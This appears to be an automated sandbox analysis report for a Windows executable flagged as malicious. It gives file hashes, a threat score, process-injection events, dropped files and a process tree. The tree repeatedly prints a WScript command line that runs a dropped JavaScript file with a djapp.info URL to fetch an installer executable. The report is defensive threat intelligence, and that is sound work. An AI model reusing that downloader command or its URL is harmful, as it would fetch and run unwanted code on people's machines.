1aa7a2f81f03679d3a45c75ce29aa4659abe0c5eb46b8b4293b8c5f302559c1e

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/04/2024, 14:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

055910bede499796d31a906c95078f11_JaffaCakes118.exe
Size

184KB
MD5

055910bede499796d31a906c95078f11
SHA1

d107b9ad2ea278057cf4c9e12b70e6e70c72040f
SHA256

1aa7a2f81f03679d3a45c75ce29aa4659abe0c5eb46b8b4293b8c5f302559c1e
SHA512

fee900e533eb8dbb4a787c725d030a58cf2a02aa465246f6b19d098794a23dbbaf4a44559a16ee1b38697e0e40aa481c7c9d1d05e9c7f7f662f58f40c04ef6f4
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3BFM:/7BSH8zUB+nGESaaRvoB7FJNndnGe

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2228	WScript.exe
8	2228	WScript.exe
10	2228	WScript.exe
12	2496	WScript.exe
13	2496	WScript.exe
15	1264	WScript.exe
16	1264	WScript.exe
18	2152	WScript.exe
19	2152	WScript.exe
21	2872	WScript.exe
22	2872	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 2228	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	28
PID 1948 wrote to memory of 2228	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	28
PID 1948 wrote to memory of 2228	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	28
PID 1948 wrote to memory of 2228	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	28
PID 1948 wrote to memory of 2496	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	30
PID 1948 wrote to memory of 2496	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	30
PID 1948 wrote to memory of 2496	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	30
PID 1948 wrote to memory of 2496	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	30
PID 1948 wrote to memory of 1264	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	32
PID 1948 wrote to memory of 1264	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	32
PID 1948 wrote to memory of 1264	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	32
PID 1948 wrote to memory of 1264	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	32
PID 1948 wrote to memory of 2152	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	34
PID 1948 wrote to memory of 2152	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	34
PID 1948 wrote to memory of 2152	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	34
PID 1948 wrote to memory of 2152	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	34
PID 1948 wrote to memory of 2872	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	36
PID 1948 wrote to memory of 2872	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	36
PID 1948 wrote to memory of 2872	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	36
PID 1948 wrote to memory of 2872	1948	055910bede499796d31a906c95078f11_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\055910bede499796d31a906c95078f11_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\055910bede499796d31a906c95078f11_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11FB.js" http://www.djapp.info/?domain=nIjSzQXWBh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf11FB.exe
  2⤵
  - Blocklisted process makes network request
  PID:2228
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11FB.js" http://www.djapp.info/?domain=nIjSzQXWBh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf11FB.exe
  2⤵
  - Blocklisted process makes network request
  PID:2496
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11FB.js" http://www.djapp.info/?domain=nIjSzQXWBh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf11FB.exe
  2⤵
  - Blocklisted process makes network request
  PID:1264
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11FB.js" http://www.djapp.info/?domain=nIjSzQXWBh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf11FB.exe
  2⤵
  - Blocklisted process makes network request
  PID:2152
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11FB.js" http://www.djapp.info/?domain=nIjSzQXWBh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf11FB.exe
  2⤵
  - Blocklisted process makes network request
  PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
44d87d695ae8e5bc46e021fe5c69c3b1

SHA1
f3721082b90536bc145ce40900ffa0a8f439ed3c

SHA256
3fdf46e976b3ec1dbd30c0ba73de6b051b2d0c32c43e1e9b5db29af05d1a0165

SHA512
d615aad7d482cc27e18dfaeb2f67747919a19818e5fb71a73f2e078afa7cf943e31bf3051d5d577f4b4415f1ad2a122e5da97a5969ca32bbd89d826e9c4f94cb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
d0eef693284bcb4a52b4acd714cdc425

SHA1
37fbcde6a551014c47d00295e9081ee1d3524ec4

SHA256
50d089ea50f332039697fe375e40eb58f9276b82ca7186537f18c3af81bc1d9c

SHA512
f35539e41147734c76f6d77cff7f68bb4e2eda8963bea50a2860d6714873e2b0d2577689b53a275dcf7d09f55f88193170a18e6fd60d7afac5e2d87514ce41b2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c50a5f56c206b70e21d04a9e9d57544b

SHA1
eae236c18490e2b8c8fd993f77e460f7bf4b4c14

SHA256
0d0c6c868f1387b70a3e6798501126c29bb25d32a313599b30478947cf35f262

SHA512
d149d08856650c2066a1275947ffc671418bc228c1ed5bcabbc23a34c0b95af0a99020a9f0d058e1159dac4e30602436ca51d1f9b9cb692b027345006a44502f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
98b01eeb75b50cfed9254401ab2d8859

SHA1
2403d84d4247bc63ad974f81bcb20828e983f204

SHA256
2cb71bff400711925b0cd56a32ccc6ebf4ebdcd825ff9a4e2cd6fe3283b78445

SHA512
8fe69f13794502888ecf4f422effc7cc6b8c9d8bba7c4701c3eb7b04e448708dcadf8bdfbabc6655da3b48f2fa354df7bba2a4d5c3a68417e938a8d2072dea04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
40KB

MD5
a85794bbf0fe0b2e42d939a1519aeab4

SHA1
8ed1f6b1d43c28a01dd96b031fbb6d0456beec73

SHA256
5d86c231da4c522aa3bf6aeb87e34e14e25895ac5a78b548e57852bc617f238a

SHA512
6686e2df8f87ff11fbe8d84c9a0cbff306e17edae5e5bc84a8854d7c1a5306d63e5a51325d6d9a3948b94cdffd9d8e6dbb7ede4e7fa78e0e3461a1ebffadfbda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
478f6f4ffde8b9d62bb4cdd5605ab6f0

SHA1
7da8bcc2994b79ff27d855d9ad9ade9acc6eb790

SHA256
ba8201aea917191ffbf729ae970720334c40dcf497a85de995e9fa1567f94cc2

SHA512
49cca810a3ac840e36928c603128bc1f03ad0b875b1b732cba0e792785c31e861cede139dafd6d0012842924b9868df501f1b5e66a7e4e3df6637c40c7e9112a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
6KB

MD5
49f2c642fe57c94dabaf029bc2833fd1

SHA1
6e152d289760dbffcd4eec62c7cc8bfbd27664c3

SHA256
518940f73ff1a85e8c4e7f6852e45680d9b41171f6ee951fd265a0fb03aaf5f8

SHA512
9fe49c48837b384f3319c5acc73eeb14d15da46ed46006ff4c0072741dbe9b25c230cc19b20053126f83dacd6903e5867bc426ae02975807c72882c30edcce82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
40KB

MD5
156c4452a0291fe87ec8aae7672e7628

SHA1
8e45635d013177bf497303c396664959dc2f72cd

SHA256
dfe399dc60fb1d55097bcd953660dd1d2d66c5bfd2f6446df70fc0b495f9c39e

SHA512
8f0b820c7e16093fcc18872da83483a9ddb59d04e3cb27cbc89f96a78659d662d06af62e8bf9d1d5d7cbbed5f9b93617518ddc630b702770fb65ac156301c6df

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab41A2.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5A13.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf11FB.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6JAD2IPJ.txt

Filesize
175B

MD5
957096d4f1d33778678daffb34704f50

SHA1
1f81f43cc927125d26874b6f700c2701bd9e6b4a

SHA256
59410883e0cec230b7739cd0e2e27d730f817f18175d0038f35190e1443d1282

SHA512
bdbe21f3a1b861a918d7663f4c1d6b7f0eeb6cd7b70f38ff3b42fa0cb006c64e87001cc7779d69fb4ae0f95db88e18ef1806e07362415035be39c8294d2fe21d

Download Submit